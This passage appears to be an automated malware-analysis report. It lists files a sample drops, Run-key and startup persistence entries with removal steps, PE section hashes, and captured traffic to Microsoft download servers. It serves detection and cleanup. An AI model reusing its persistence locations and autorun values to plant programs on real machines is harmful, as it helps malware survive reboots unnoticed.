C:\82ea8d5099742dc8f49f42\about_logical_operators.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_types.ps1xml.help.txt (481 bytes)
C:\82ea8d5099742dc8f49f42\about_special_characters.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_preference_variables.help.txt (37 bytes)
C:\82ea8d5099742dc8f49f42\about_arithmetic_operators.help.txt (168 bytes)
C:\82ea8d5099742dc8f49f42\about_while.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_redirection.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_parameters.help.txt (962 bytes)
C:\82ea8d5099742dc8f49f42\update\eula.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\wsmsvc.dll (15909 bytes)
C:\82ea8d5099742dc8f49f42\about_locations.help.txt (794 bytes)
C:\82ea8d5099742dc8f49f42\pssetupnativeutils.exe (9 bytes)
C:\82ea8d5099742dc8f49f42\about_script_internationalization.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_jobs.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_ise.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_return.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe.mui (10 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\82ea8d5099742dc8f49f42\wsmprovhost.exe (657 bytes)
C:\82ea8d5099742dc8f49f42\profile.ps1 (772 bytes)
C:\82ea8d5099742dc8f49f42\dotnettypes.format.ps1xml (266 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.runtime.dll (33 bytes)
C:\82ea8d5099742dc8f49f42\about_language_keywords.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\windowspowershellhelp.chm (26041 bytes)
C:\82ea8d5099742dc8f49f42\about_comparison_operators.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\about_transactions.help.txt (1011 bytes)
C:\82ea8d5099742dc8f49f42\about_pssnapins.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_jobs.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\powershelltrace.format.ps1xml (344 bytes)
C:\82ea8d5099742dc8f49f42\about_execution_policies.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\wsmplpxy.dll (603 bytes)
C:\82ea8d5099742dc8f49f42\about_automatic_variables.help.txt (14 bytes)
C:\82ea8d5099742dc8f49f42\wsmanhttpconfig.exe (3009 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pwrshsip.dll (24 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_requirements.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_aliases.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_escape_characters.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_faq.help.txt (775 bytes)
C:\82ea8d5099742dc8f49f42\about_session_configurations.help.txt (276 bytes)
C:\82ea8d5099742dc8f49f42\update\spcustom.dll (23 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1088 bytes)
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5302 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (137010 bytes)
%WinDir%\comsetup.log (49590 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242961 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\tmp\M7ADGJNQ\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\SIMQUY25\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%WinDir%\assembly\tmp\TGKNQUX0\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\5UY26AEJ\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\VJNRVZ37\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\YKOSW048\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\7RUY147A\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\QBEILORU\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\3NQUX036\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\QDHLOSW0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\SCFJMPSV\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\G037ADGJ\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\CWZ269CF\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\tmp\3NQTW036\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\WJOSX16A\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\I269CFIM\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\1LOSVY14\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\WKOSW048\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\SEIMQUY2\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\6VY26AEI\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\PADGJNQT\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\AUX047AD\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\O8BEHLOR\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\TcEMbLQgCOBP (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Application Data\2b086d\d4387d.48198b5 (9 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (27121 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\c53169.lnk (801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\228ab4.48198b5 (49 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (162 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\48d1ef.lnk (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\910776.bat (94 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exec"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 26060 | 26112 | 4.42534 | ec6c00d0dbffd0aaf40d629cdc5fbbf7 |
.data | 32768 | 6796 | 1024 | 2.20139 | 317f8a934ee443eee01c2a315bde9ca1 |
.idata | 40960 | 4216 | 4608 | 3.49941 | d8675ba112ef922c6057a02546757a1a |
.rsrc | 49152 | 775003 | 775168 | 5.18253 | 4d679e1aa76a7449bd880fa36dfcdce8 |
.reloc | 827392 | 5038 | 5120 | 2.58043 | 83de2f9b2c95be6fea06bced7e8a058e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
78beabc7c6a1bab138ba6aa59a6f66e8
Network Activity
URLs
URL | IP |
---|---|
hxxp://microsoft.com/ | |
hxxp://e2847.dspb.akamaiedge.net/ | |
hxxp://e2847.dspb.akamaiedge.net/uk-ua/ | |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://www.microsoft.com/ | 23.61.219.168 |
hxxp://www.microsoft.com/uk-ua/ | 23.61.219.168 |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 84.53.167.128 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Mon, 27 Jun 2016 23:01:31 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: ahvTkOAUdk6BlrWx.1.4
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 63551
Date: Mon, 27 Jun 2016 23:01:32 GMT
Connection: keep-alive
Set-Cookie: MS-CV=ahvTkOAUdk6BlrWx.1; domain=.microsoft.com; expires=Tue, 28-Jun-2016 23:01:31 GMT; path=/
Set-Cookie: MS-CV=ahvTkOAUdk6BlrWx.2; domain=.microsoft.com; expires=Tue, 28-Jun-2016 23:01:32 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk-ua" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js">.. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><script type="text/javascript" src="hXXps://cdn.optimizely.com/js/6212760188.js"></script><script type="text/javascript" src="//c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=3402EA63-9A93-A79A-085A-5FDA6D3F966E"></script><title>Microsoft..... ................ ..........
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
